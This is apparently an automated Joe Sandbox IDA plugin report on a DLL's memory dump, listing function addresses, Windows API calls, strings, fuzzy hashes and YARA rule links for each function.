Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 7ac27ce0450e9c67379d08f3a7ee8eeff429f6f9c136dd3f83163563ab68531e
Instruction ID: d5292fa929461a453cfe2b59fa76282a330f7d0b7446e49de636e59bcf3e7fd0
Opcode Fuzzy Hash: 7ac27ce0450e9c67379d08f3a7ee8eeff429f6f9c136dd3f83163563ab68531e
Instruction Fuzzy Hash: E001D43261E2125FAB0125B5ACE461EEA99EBC3679B22C22BE934511D0FFB24D414784

Uniqueness

Uniqueness Score: -1.00%

Function 615A91C0, Relevance: 9.0, APIs: 6, Instructions: 44COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 615A9563
_com_issue_error.COMSUPP ref: 615A956D
_com_issue_error.COMSUPP ref: 615A9577
_com_issue_error.COMSUPP ref: 615A957D
_com_issue_error.COMSUPP ref: 615A9587
_com_issue_error.COMSUPP ref: 615A9591

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _com_issue_error
String ID:
API String ID: 2162355165-0
Opcode ID: 5577ac8777a4949b995c9d7e499f8ef114fc649f826bba82d4c5dfe18c1e7d5a
Instruction ID: 82ca54fff28ec6b3808426c7102139822910c85314c12e20945509afee4b0dbb
Opcode Fuzzy Hash: 5577ac8777a4949b995c9d7e499f8ef114fc649f826bba82d4c5dfe18c1e7d5a
Instruction Fuzzy Hash: 5DF090B5D0018FAEFB01DFA58810F9EFBA8EF90618F10812CAA14B6244CB302900C66F

Uniqueness

Uniqueness Score: -1.00%

Function 615B1390, Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 274COMMON

Download Yara Rule

APIs

Part of subcall function 615ABC70: SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,3F3F20BC,00000000,?), ref: 615ABCDE

ShellExecuteW.SHELL32(00000000,edit,?,00000000,00000000,00000001), ref: 615B13E7
PdhRemoveCounter.PDH(?,?,00000000), ref: 615B1483
PdhCloseQuery.PDH(?,?,00000000), ref: 615B1498

Strings

edit, xrefs: 615B13E0
0, xrefs: 615B1547

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CloseCounterExecuteFolderPathQueryRemoveShell
String ID: 0$edit
API String ID: 2809573910-562573004
Opcode ID: 4cef46f2eb49909d3a51c598d33a6cec58711f97094690d8d63c74b8581c6208
Instruction ID: 222f07336a614117e818000b52c1349413bef9243f080f90fdece7c80195cfef
Opcode Fuzzy Hash: 4cef46f2eb49909d3a51c598d33a6cec58711f97094690d8d63c74b8581c6208
Instruction Fuzzy Hash: 61A1DF726002058FD714CF68D8A0B9EFBB1FF85354F148A1CE9A59B690D736E984CBD2

Uniqueness

Uniqueness Score: -1.00%

Function 615CD00E, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 615CD196

Strings

., xrefs: 615CD39F
*?, xrefs: 615CD04F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?$.
API String ID: 269201875-3972193922
Opcode ID: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction ID: 9a53eb64870354d8647f93b6e9e01d509c99dabecef0b2feeaad81b01b263475
Opcode Fuzzy Hash: 74b65b91c5630c4a46a150835dfb5fddcd3d84dfc03b3767c317cfffbab0555b
Instruction Fuzzy Hash: EC610676D4420AAFDB05CFE8C8804EDFBF5EF88754B2581AED855E7300E631AE418B91

Uniqueness

Uniqueness Score: -1.00%

Function 615A5D90, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91threadclipboardCOMMON

Download Yara Rule

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 615A5E04
SwitchToThread.KERNEL32(00000000,?,?,?,?,?,?), ref: 615A5E74
GetOpenClipboardWindow.USER32(00000000,?,?,?), ref: 615A5E93
GetACP.KERNEL32(00000000,?,?,?), ref: 615A5EA4

Strings

e, xrefs: 615A5DAF

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ClipboardOpenSwitchThreadUnothrow_t@std@@@Window__ehfuncinfo$??2@
String ID: e
API String ID: 1567280528-4024072794
Opcode ID: e5052227c72a52b2e90fa5f0b00c2f71cb708c814f4b38943b10fdff2a135502
Instruction ID: 9c996fd3605d54e0a6a6354620c44745b6a35e648b637ef36818bf9dc933d4af
Opcode Fuzzy Hash: e5052227c72a52b2e90fa5f0b00c2f71cb708c814f4b38943b10fdff2a135502
Instruction Fuzzy Hash: 2F31C2329243058FC302CE3A844461EF7E6AFDB285F14CB2AF451F2151EB2098898B92

Uniqueness

Uniqueness Score: -1.00%

Function 615B1C00, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 39windowCOMMON

Download Yara Rule

APIs

InsertMenuW.USER32(?,?,00000C00,?,00000000), ref: 615B1C2A
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Reload Configuration)), ref: 615B1C3E
InsertMenuW.USER32(?,?,00000400,?,Performance Monitor - (Edit Configuration)), ref: 615B1C52

Strings

Performance Monitor - (Edit Configuration), xrefs: 615B1C40
Performance Monitor - (Reload Configuration), xrefs: 615B1C2C

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: InsertMenu
String ID: Performance Monitor - (Edit Configuration)$Performance Monitor - (Reload Configuration)
API String ID: 1478380399-4081388356
Opcode ID: a3a077ddb8514277975a5ea14b0c7c1579faa67f85ec69711019d61f71522ea8
Instruction ID: f7ac8e9f3ed5d6186622635ab2cbf623fef464fa3918c9d18283ad58b06a3574
Opcode Fuzzy Hash: a3a077ddb8514277975a5ea14b0c7c1579faa67f85ec69711019d61f71522ea8
Instruction Fuzzy Hash: E2F0E23314020D7BEB01DE859C84FBFBB6DEB49710F048016FB24A6081C371A921AFB5

Uniqueness

Uniqueness Score: -1.00%

Function 615C7468, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON

Download Yara Rule

APIs

Part of subcall function 615C74CC: _free.LIBCMT ref: 615C74EC

_free.LIBCMT ref: 615C7482

Part of subcall function 615C9B98: HeapFree.KERNEL32(00000000,00000000,?,615C731A,000000FF,000000FF), ref: 615C9BAE
Part of subcall function 615C9B98: GetLastError.KERNEL32(615C6995,?,615C731A,000000FF,000000FF), ref: 615C9BC0

_free.LIBCMT ref: 615C7495
_free.LIBCMT ref: 615C74A6
_free.LIBCMT ref: 615C74B7

Strings

8!G, xrefs: 615C746F

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID: 8!G
API String ID: 776569668-2971577578
Opcode ID: e037c971cc88050c9f453e5e98e54f631bb158c215dc0c732454cdcc5b66a0f3
Instruction ID: 8f408a6b65a3a11bdf0704d08df605cda5facb608fa07ab9e4fcebd90fded502
Opcode Fuzzy Hash: e037c971cc88050c9f453e5e98e54f631bb158c215dc0c732454cdcc5b66a0f3
Instruction Fuzzy Hash: E5F01CF48342527F9F015FA6E88489AFF7DEAA6A19383414AE428D6210D73209959FC2

Uniqueness

Uniqueness Score: -1.00%

Function 615CED2F, Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 93c0a42f04c929ab2745caa7c8cd13ab0f2c8409fb3af37177f67d85877c98ff
Instruction ID: 58e7b52a8473c06fb1247fc671e658012676fea8fd0ee3021e0619de08c6cb71
Opcode Fuzzy Hash: 93c0a42f04c929ab2745caa7c8cd13ab0f2c8409fb3af37177f67d85877c98ff
Instruction Fuzzy Hash: ED7171359012179FEB21CFDAC886AAEFF79EF42B50F14862DE43457180D7719981CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 615CB9B3, Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 615C9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,615B8F9C,00000105,000000FF,FFFFFFFF,00000000,?,615A1687,?,00000103,000000FF), ref: 615C9C04

_free.LIBCMT ref: 615CBABE
_free.LIBCMT ref: 615CBAD5
_free.LIBCMT ref: 615CBAF4
_free.LIBCMT ref: 615CBB0F
_free.LIBCMT ref: 615CBB26

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$AllocateHeap
String ID:
API String ID: 3033488037-0
Opcode ID: c4fd9457e8c1c5ecb6d3a7dbfd663030d4d94fb1939cf3079446731873bdd556
Instruction ID: 110af0ea1f4f5c8ba9cee2ec183ce97e95b6b4ce694146316a4289f79c5f22e2
Opcode Fuzzy Hash: c4fd9457e8c1c5ecb6d3a7dbfd663030d4d94fb1939cf3079446731873bdd556
Instruction Fuzzy Hash: 2B51C271A04605AFEB11EFE9CC40A6AF7F4EF88B69B44C56DE849DB250E731D9018B81

Uniqueness

Uniqueness Score: -1.00%

Function 615B4260, Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

PdhRemoveCounter.PDH(?,3F3F20BC,?,?,00000000,615D9E9B,000000FF,?,615B15EF,00000000), ref: 615B42B3
PdhCloseQuery.PDH(?,3F3F20BC,?,?,00000000,615D9E9B,000000FF,?,615B15EF,00000000), ref: 615B42DE
PdhOpenQueryW.PDH(00000000,00000000,?), ref: 615B4302
PdhValidatePathW.PDH(?), ref: 615B435E
PdhAddCounterW.PDH(?,?,00000000,?), ref: 615B438A

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: CounterQuery$CloseOpenPathRemoveValidate
String ID:
API String ID: 698537007-0
Opcode ID: 199d36fea0d26ccc8e8770a709c653c588d5b5aea776ce7b21dab9e7658279e1
Instruction ID: 501db1512c5960c8514be4f1a80d78efd9bed1fe783aed702de2cef5a4942d96
Opcode Fuzzy Hash: 199d36fea0d26ccc8e8770a709c653c588d5b5aea776ce7b21dab9e7658279e1
Instruction Fuzzy Hash: 0051BC71900259AFDB20CF54C840BDAF7B8FF85314F05C29AE569AB240DB74AAC5CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 615C70FB, Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 615C716D
_free.LIBCMT ref: 615C718D

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 409bbba985f2a2ac12a81ecfedbfb9a89ee8eec4fc253efcb25bf75ca874c94e
Instruction ID: f1d234391bfd0a381d576a19bf5637edf797bdbce277c2c30a43cca9737c2038
Opcode Fuzzy Hash: 409bbba985f2a2ac12a81ecfedbfb9a89ee8eec4fc253efcb25bf75ca874c94e
Instruction Fuzzy Hash: C5418036A002049FDB14DFB8C890A5DB7F6EFC5B14B1685ADD515EB781DB31AA018B81

Uniqueness

Uniqueness Score: -1.00%

Function 615A4C40, Relevance: 7.6, APIs: 5, Instructions: 124COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 615A4C7C
std::_Lockit::_Lockit.LIBCPMT ref: 615A4C9E
std::_Lockit::~_Lockit.LIBCPMT ref: 615A4CBE
std::_Facet_Register.LIBCPMT ref: 615A4D8F
std::_Lockit::~_Lockit.LIBCPMT ref: 615A4DAF

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 3d5d8e675633a7fcedfd81cd181fbe912654e5cbdcf56d1cb51e238de2a13a96
Instruction ID: baf1cefd585830663a38098c1a578f645451a188aaeb4bf2d70436b547673bb8
Opcode Fuzzy Hash: 3d5d8e675633a7fcedfd81cd181fbe912654e5cbdcf56d1cb51e238de2a13a96
Instruction Fuzzy Hash: F951BD70954216CFCB11CF98C890B9EFBF4EF85714F198519D816AB280DB75AA45CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 615A4AE0, Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 615A4B16
std::_Lockit::_Lockit.LIBCPMT ref: 615A4B36
std::_Lockit::~_Lockit.LIBCPMT ref: 615A4B56
std::_Facet_Register.LIBCPMT ref: 615A4BF3
std::_Lockit::~_Lockit.LIBCPMT ref: 615A4C13

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
String ID:
API String ID: 459529453-0
Opcode ID: 74e1af03f58335da03fec2075babc7589af5cf2d957d87eb56c818b6e62afd6f
Instruction ID: 2f8191ff1cbee55a3609d2dbc63ab7febb12a35ee57f848949fe53d8e0cd354f
Opcode Fuzzy Hash: 74e1af03f58335da03fec2075babc7589af5cf2d957d87eb56c818b6e62afd6f
Instruction Fuzzy Hash: 8941ED71A842098FCB16CF98D490B9EF7F4EB84714F1A8569D816AB281DB30AE41CF91

Uniqueness

Uniqueness Score: -1.00%

Function 615CF32A, Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(FFFFFFFF,00000000,?,00000002,00000000,00000000,00000000,00000000,?,FFFFFFFF,00000001,00000002,?,00000001,00000000,?), ref: 615CF377
__alloca_probe_16.LIBCMT ref: 615CF3AF
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 615CF400
GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 615CF412
__freea.LIBCMT ref: 615CF41B

Part of subcall function 615C9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,615B8F9C,00000105,000000FF,FFFFFFFF,00000000,?,615A1687,?,00000103,000000FF), ref: 615C9C04

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
String ID:
API String ID: 313313983-0
Opcode ID: 4cfbbefb3993da307c4da2c12e6d55e698269af35a2a0c5904951f3ad77a4b32
Instruction ID: bcb357d76ca04d18d2158c83ab4005d62efe7d921937e3a1cf1dac095d36b67e
Opcode Fuzzy Hash: 4cfbbefb3993da307c4da2c12e6d55e698269af35a2a0c5904951f3ad77a4b32
Instruction Fuzzy Hash: 5A31C172A1021AABEF158FA4CC80DAEBBA5EF81B14F05812DEC14D7180E735CD95CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 615CDD03, Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 615CDD0C
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 615CDD2F

Part of subcall function 615C9BD2: RtlAllocateHeap.NTDLL(00000000,00000103,000000FF,?,615B8F9C,00000105,000000FF,FFFFFFFF,00000000,?,615A1687,?,00000103,000000FF), ref: 615C9C04

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 615CDD55
_free.LIBCMT ref: 615CDD68
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 615CDD77

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: 73b0b447d93f040f1c96ad484d3e0785361f57f08bcd1f20a3816dcba3f30949
Instruction ID: 38e5cfe0e21770bc15e0f3a02d07c70f9a4711f80cd0c53a4f76f47879ad5bda
Opcode Fuzzy Hash: 73b0b447d93f040f1c96ad484d3e0785361f57f08bcd1f20a3816dcba3f30949
Instruction Fuzzy Hash: CB019272A51A1A7B37111DFA4C48C7FED7DDAC3E54302816DB914C3144DA618C0182F2

Uniqueness

Uniqueness Score: -1.00%

Function 615CA3E2, Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(000000FF,615C6995,?,615C642D,615C9BBE,615C6995,?,615C731A,000000FF,000000FF), ref: 615CA3E7
SetLastError.KERNEL32(00000000,00000006,000000FF,?,615C731A,000000FF,000000FF), ref: 615CA40D
_free.LIBCMT ref: 615CA44D
_free.LIBCMT ref: 615CA480
SetLastError.KERNEL32(00000000,000000FF), ref: 615CA48D

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: ErrorLast$_free
String ID:
API String ID: 3170660625-0
Opcode ID: 315554f690e70f41c6f8c58e1f66c5ac91b28433357edc9b9696e54acb0f1345
Instruction ID: 3e49f26b2a125eb52422208de55ba86f859b7d17b2f6932b4e18dbdf3077e69e
Opcode Fuzzy Hash: 315554f690e70f41c6f8c58e1f66c5ac91b28433357edc9b9696e54acb0f1345
Instruction Fuzzy Hash: 331186365145066A9A016EF5DC89E1EEF6AABC3FA9717C21DF434921E0FF21CC415263

Uniqueness

Uniqueness Score: -1.00%

Function 615B8508, Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,00000008,00000000,615B3342), ref: 615B850D
HeapAlloc.KERNEL32(00000000), ref: 615B8514
GetProcessHeap.KERNEL32(00000000,00000000), ref: 615B855A
HeapFree.KERNEL32(00000000), ref: 615B8561

Part of subcall function 615B83A7: GetProcessHeap.KERNEL32(00000008,0000000D,00000000,?,615B8550,00000000), ref: 615B83CB
Part of subcall function 615B83A7: HeapAlloc.KERNEL32(00000000), ref: 615B83D2

Strings

;\[a, xrefs: 615B8541

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: Heap$Process$Alloc$Free
String ID: ;\[a
API String ID: 1864747095-3318329
Opcode ID: d7d832f35c229bfe42564f7b85584ccf20c8cb821ab935bad14dcb3848f04b2e
Instruction ID: 0115b445d2f44a328d0dff237d1a92677a38765c67cb071445c4b452c80a794a
Opcode Fuzzy Hash: d7d832f35c229bfe42564f7b85584ccf20c8cb821ab935bad14dcb3848f04b2e
Instruction Fuzzy Hash: F8F02472944613ABCB112BF8AC2CA4FEA66AFC3751B07D42CF065C6288DF30C8419762

Uniqueness

Uniqueness Score: -1.00%

Function 615D4978, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 615D4990

Part of subcall function 615C9B98: HeapFree.KERNEL32(00000000,00000000,?,615C731A,000000FF,000000FF), ref: 615C9BAE
Part of subcall function 615C9B98: GetLastError.KERNEL32(615C6995,?,615C731A,000000FF,000000FF), ref: 615C9BC0

_free.LIBCMT ref: 615D49A2
_free.LIBCMT ref: 615D49B4
_free.LIBCMT ref: 615D49C6
_free.LIBCMT ref: 615D49D8

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97fd22b3b18a28fc5f0ed9400a3822217f9fff0a64d7660ecc91e2630eeec4a6
Instruction ID: f951b7932580ac6c79e812ad4334bd0749b54a59a59af97b3cb6fecc41fb4edb
Opcode Fuzzy Hash: 97fd22b3b18a28fc5f0ed9400a3822217f9fff0a64d7660ecc91e2630eeec4a6
Instruction Fuzzy Hash: 3BF0F431D54619A79A10DFD9E481C5BFBEEAA81758792C84AE069D7900CB34FC8087E5

Uniqueness

Uniqueness Score: -1.00%

Function 615B8750, Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

_com_issue_error.COMSUPP ref: 615B875C
GetLastError.KERNEL32(?,00000000,?,00000000,8007000E), ref: 615B8761
_com_issue_error.COMSUPP ref: 615B8774
GetLastError.KERNEL32(?,00000000,8007000E), ref: 615B8782
_com_issue_error.COMSUPP ref: 615B8795

Memory Dump Source

Source File: 0000000E.00000002.378857753.00000000615A1000.00000020.00020000.sdmp, Offset: 615A0000, based on PE: true

Associated: 0000000E.00000002.378840460.00000000615A0000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.378991198.00000000615DB000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.379040605.00000000615EF000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.379055869.00000000615F2000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_615a0000_rundll32.jbxd

Similarity

API ID: _com_issue_error$ErrorLast
String ID:
API String ID: 1321852664-0
Opcode ID: 21240e8094975a1fc9d2b7caa67f811740b3e432d99e30f3af74cbcb977da7ad
Instruction ID: f8aeb757c822719f55ca5627c13f7544bb3d480c05690a200e17dfebe8c231fa
Opcode Fuzzy Hash: 21240e8094975a1fc9d2b7caa67f811740b3e432d99e30f3af74cbcb977da7ad
Instruction Fuzzy Hash: BDE08678D1015B9ACA006EB0081879EA1942A81124B20D6186064E5050DB39C410677F

Uniqueness

Uniqueness Score: -1.00%

Function 615C6AD4, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

